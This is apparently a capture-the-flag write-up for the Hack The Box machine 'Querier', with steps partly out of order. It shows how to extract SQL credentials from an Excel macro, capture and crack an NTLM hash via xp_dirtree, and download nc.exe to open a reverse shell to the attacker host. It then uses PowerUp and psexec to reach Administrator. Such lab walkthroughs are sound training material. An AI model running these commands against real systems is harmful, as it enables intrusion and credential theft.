Hackthebox - Querier
Last updated
Last updated
Windows
Let's try to list the shares
Let's try to connect to Reports. It works
We get a file that is an excel file with macro. With an online research we find this article by Nairuz Abulhul that mentions
We can connect with mssqlclient.py from impacket
Note: I was struggling with the impacket command turns out that in order to work the password neeeds to have not double quotes or no quotes BUT single quotes (seems to be because of the dollar sign in the pass)
python3 /opt/impacket/examples/mssqlclient.py QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
We get a shell this way
Here is an interesting article from hacktricks for mssql
We do not have enough rights to create a user
Itried this for cmd execution but it is not working
Ok we do not have much permissions we should check another way.
We can try something like this on Mark Mo's blog
Let's create a directory in our attacking machine mkdir querysmb
Now we just need to do the exec command to drop the hash exec xp_dirtree '\\10.10.14.7\myshare\'
Let's check our permissions with this user SELECT * FROM fn_my_permissions(NULL, 'SERVER');
We have many more than previously
Seems like we could event try xp_cmdshell again
We can get the user flag EXEC master..xp_CMDShell 'type C:\Users\mssql-svc\Desktop\user.txt';
Let's get nc.exe in our target python3 -m http.server 80
EXEC master..xp_CMDShell 'curl.exe -o C:\Users\mssql-svc\Desktop\nc.exe http://10.10.14.7/nc.exe' we get it
EXEC master..xp_CMDShell 'dir C:\Users\mssql-svc\Desktop\' we check that it worked
We set a listener rlwrap nc -lvp 4444
EXEC master..xp_CMDShell 'C:\Users\mssql-svc\Desktop\nc.exe -e cmd.exe 10.10.14.7 4444'
systeminfo
Let's use wes to see what exploit we could use python3 /opt/wesng/wes.py --color sysinfo.txt | grep -B 3 -A 5 "Privilege Vulnerability" I will grep a few lines before and after to have the whole cve info
I also want to try PowerUp before using any kernel exploit
curl.exe -o C:\Users\mssql-svc\Desktop\powerup.ps1 http://10.10.14.7/PowerUp.ps1
powershell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks | Out-String -Width 4096
We have a clear password for the Administrator MyUnclesAreMarioAndLuigi!!1!
python3 /opt/impacket/examples/psexec.py Administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125
We have an admin shell we can grab the final flag! type C:\Users\Administrator\Desktop\root.txt
Using this olevba Currency\ Volume\ Report.xlsm we are able to find the password for SQL server
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
We can list the tables select * from volume.INFORMATION_SCHEMA.TABLES;
We can list users select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
SELECT CONCAT(sp.name, '***', master.sys.fn_varbintohexstr(sl.password_hash)) from master.sys.server_principals sp LEFT JOIN sys.sql_logins sl ON sp.principal_id = sl.principal_id
We can check the MS SQL version we have SELECT @@VERSION AS 'SQL Server Version';
Check if we have other db select name from sys.databases;
SELECT * FROM fn_my_permissions(NULL, 'SERVER'); check our user perms
Let's launch smbserver python3 /opt/impacket/examples/smbserver.py -smb2support myshare querysmb
And it works
Now let's copy the hash in a txt and try to crack it using hashcat hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Let's try to connect again on sql but with this user.
Let's try to enable it enable_xp_cmdshell if we issue our previous command again it works
We get a shell
